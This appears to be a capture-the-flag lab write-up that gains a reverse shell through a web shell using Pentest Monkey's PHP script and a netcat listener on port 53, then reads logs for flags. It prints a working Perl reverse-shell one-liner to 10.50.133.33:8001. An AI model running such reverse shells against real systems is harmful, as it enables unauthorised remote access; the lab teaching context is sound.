# First Contact

We have identified a potential attack surface that we can use to execute php and shell commands on. We are able to execute a reverse shell on the web shell in order to get a shell back on the machine.

### Uploading a php Reverseshell

For the PHP reverse shell, we’ll be using Pentest Monkey’s reverse shell found [here](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php) or in kali under /usr/share/webshells/php/php-reverse-shell.php 

1. Modify the reverse shell to your **tun0 IP address** and **port**.
2. Paste php code into webshell. Note: First line **\<?php** and last line **?>** needs to be removed
3. start netcat listener on port 53
4. Execute reverseshell

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FyglQw6Cs06Wn8JIoTJWY%2Fphp_reverse01.png?alt=media&#x26;token=05ba2e83-d383-4b29-9bc9-c680305d46ff" alt=""></div>

Problem with netcat listener on port 53

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FSdLpSla9YjRdEU3XeO5m%2Fphp_reverse02.png?alt=media&#x26;token=7bd49698-4c3d-4a3f-8261-a89d39547312" alt=""></div>

Kill systemd-resolv process and start netcat listener again

Execute the reverseshell:

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FqjqKn2L17nX5IEGbrybH%2Fphp_reverse04.png?alt=media&#x26;token=079dbc11-b8c3-42dc-bab1-bd01cb38fca4" alt=""></div>

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FO6Oj9n3L73bAdZAvcvPT%2Fphp_reverse03.png?alt=media&#x26;token=4f1e7199-3302-48bf-b2e3-99af16b10e54" alt=""></div>

To answer the questions and find the flag I need to focus myself on logs

Searching for logs: cd /var/log

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FM8gIVK7m0NfwOi1XCirc%2Fphp_reverse05.png?alt=media&#x26;token=57b90539-4ccd-49ed-9f8b-159100802fb5" alt="content of /var/log"></div>

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FtDtNoqshPBqs6z0UGCWX%2Fphp_reverse06.png?alt=media&#x26;token=b2fb319a-5285-48a1-90b5-2e1b84ff12f0" alt="content of login.log and flag.txt"></div>

Getting the root flag

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FArMlK7biPuDRpGZ0odnl%2Fphp_reverse07.png?alt=media&#x26;token=acdb78db-040d-4532-afe1-ac4b568949c4" alt="content of rot.txt"></div>

### Additional way to get a reverseshell

{% embed url="<https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md>" %}
reverseshell cheatsheet
{% endembed %}

```
perl -e 'use Socket;$i="10.50.133.33";$p=8001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

![Execute perl reverse shell](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2F72VZYSPluXcSD5e1ziik%2Fperl_reverseshell.png?alt=media\&token=b1357ec8-2687-4db4-b68f-0aa0b03ae539)

### Questions

![](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FVkLslY61LmTxpYc3nJ1C%2Fquestions_task10.png?alt=media\&token=6f09b468-8946-4cb7-9074-c03afbecf18b)